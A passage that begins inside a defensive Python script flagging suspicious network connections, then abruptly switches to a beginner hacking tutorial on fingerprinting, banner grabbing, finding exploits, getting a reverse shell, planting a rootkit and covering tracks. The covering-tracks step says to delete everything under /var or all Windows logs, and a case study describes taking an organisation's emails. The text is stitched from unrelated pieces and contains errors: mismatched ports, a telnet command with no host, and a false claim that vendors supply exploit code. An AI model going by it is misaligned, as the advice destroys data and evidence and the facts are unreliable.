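        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP" and len(parts) == 5:
            proto, local, foreign, state, pid = parts
        elif parts[0] == "UDP" and len(parts) == 4:
            proto, local, foreign, pid = parts
            state = ""
        else:
            continue
        conns.append({"proto": proto, "local": local, "foreign": foreign,
                      "state": state, "pid": int(pid)})
    return conns


def parse_tasklist(text: str) -> dict:
    """Map PID -> image name from `tasklist` output (image names may contain spaces)."""
    procs = {}
    for line in text.splitlines():
        m = TASK_RE.match(line)
        if m:
            procs[int(m.group("pid"))] = m.group("image")
    return procs


def port_of(addr: str) -> int:
    """Port part of 'host:port' (also works for '[::1]:443')."""
    return int(addr.rsplit(":", 1)[1])


def triage(netstat_text: str, tasklist_text: str,
           known_apps=KNOWN_NETWORK_APPS) -> dict:
    """Return {pid: {"image", "reasons", "connections"}} for anything suspicious."""
    procs = parse_tasklist(tasklist_text)
    report = {}
    for c in parse_netstat(netstat_text):
        image = procs.get(c["pid"], "<no matching process>")
        reasons = set()
        if image.lower() not in known_apps:
            reasons.add("image not in allowlist")
        if c["state"] == "LISTENING" and c["local"].rsplit(":", 1)[0] in ("0.0.0.0", "[::]"):
            reasons.add("listens on all interfaces")
        if c["state"] == "ESTABLISHED" and port_of(c["foreign"]) not in COMMON_REMOTE_PORTS:
            reasons.add(f"outbound to uncommon port {port_of(c['foreign'])}")
        if reasons:
            entry = report.setdefault(c["pid"], {"image": image, "reasons": set(),
                                                 "connections": []})
            entry["reasons"].update(reasons)
            entry["connections"].append(c["foreign"])
    return {pid: {**e, "reasons": sorted(e["reasons"])} for pid, e in report.items()}


if __name__ == "__main__":
    for pid, entry in triage(NETSTAT_OUTPUT, TASKLIST_OUTPUT).items():
        print(pid, entry)
```

Only the process the allowlist does not know about is reported, with every reason attached, so the reader knows which PID to hand to `taskkill /PID` and, more importantly, which binary to investigate: killing the process closes the connections, but it says nothing about what started it, so check the usual startup locations before calling the machine clean.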
3. OS Fingerprinting

OS (Operating System) fingerprinting is the process of finding out the victim's operating system (Windows, Linux, UNIX).


When exploring a network for security auditing or inventory/administration, you usually want to know more than the bare IP addresses of identified machines. Your reaction to discovering a printer may be different from finding a router, wireless access point, telephone PBX, game console, Windows desktop, or UNIX server. Finer-grained detection (such as distinguishing Mac OS X 10.4 from 10.3) is useful for determining vulnerability to specific flaws and for tailoring effective exploits for those vulnerabilities.

Tools: nmap, NetScanTools Pro, P0f.

4. Banner Grabbing

Banner grabbing is an attack designed to deduce the brand and/or version of an operating system or application. That is, after port scanning we found open port 80 (Apache) and the target OS is Linux, but we don't know which version of Apache is running, like Apache 2.0, 2.2 or 2.6.

Example: c:\> telnet 80 [Enter]
Change the target port 80 to another as needed.
5. Vulnerability Assessment

What is Vulnerability Assessment?
The word “vulnerability” describes a problem (such as a programming bug or common misconfiguration) that allows a system to be attacked or broken into.

A vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system.

Vulnerability assessments can be conducted for anything from a small business to large regional infrastructures. Vulnerability from the perspective of disaster management means assessing the threats from potential hazards to the population and to the infrastructure developed in that particular area. It can be done in political, social, economic and environmental fields.

Assessments are typically performed according to the following steps:

1. Cataloging assets and capabilities (resources) in a system.
2. Assigning quantifiable value (or at least rank order) and importance to those resources
3. Identifying the vulnerabilities or potential threats to each resource
4. Mitigating or eliminating the most serious vulnerabilities for the most valuable resources

Automated tools: Nessus, Nikto, Core Impact, Retina, etc.

6. Search & Build Exploit

Manual method: we can find vulnerabilities manually with the help of vulnerability archive sites like www.milw0rm.com and http://www.packetstormsecurity.org/
For the exploit and final attack, open the websites of, say, Microsoft, Adobe or Mozilla, which provide the source code. You need to download the code and compile it to prepare the exploit for the final attack.
7. Attack
Launch the attack on the remote system and get a reverse shell.

8. Maintain Access
After getting remote access we place a rootkit or Trojan for future remote access, without any password.
[For more information you’ll have to wait for the next chapter]

9. Covering Tracks
Covering tracks is the process of deleting all logs on the remote system. If the target system is Linux or UNIX, delete all entries in the /var folder, and if it is Windows, delete all events and logs.

Case Study: 1.3

You are working in abc company as an ethical hacker, and your company gets a contract from the government to hack a terrorist organization's server to get all their emails.

Ans) First we perform information gathering (collecting information like the IP address and physical address). Second we perform port scanning to find open ports: 22, 25, 80. Then we perform OS fingerprinting with the help of nmap and p0f, and if the result is "Linux 2.6" we next perform banner grabbing on port 25 (related to the email server), for which the command used is:

C:\> telnet abc.com 80
Result is : HTTP 1.1 400 BAD REQUEST
Server: Apache 2.0 Linux

So after that we perform a manual vulnerability assessment with the help of www.milw0rm.com and search "Apache 2.0" >> then download the exploit code >> compile the exploit code and attack, then take a backup of all email from the remote system.

Project DONE!
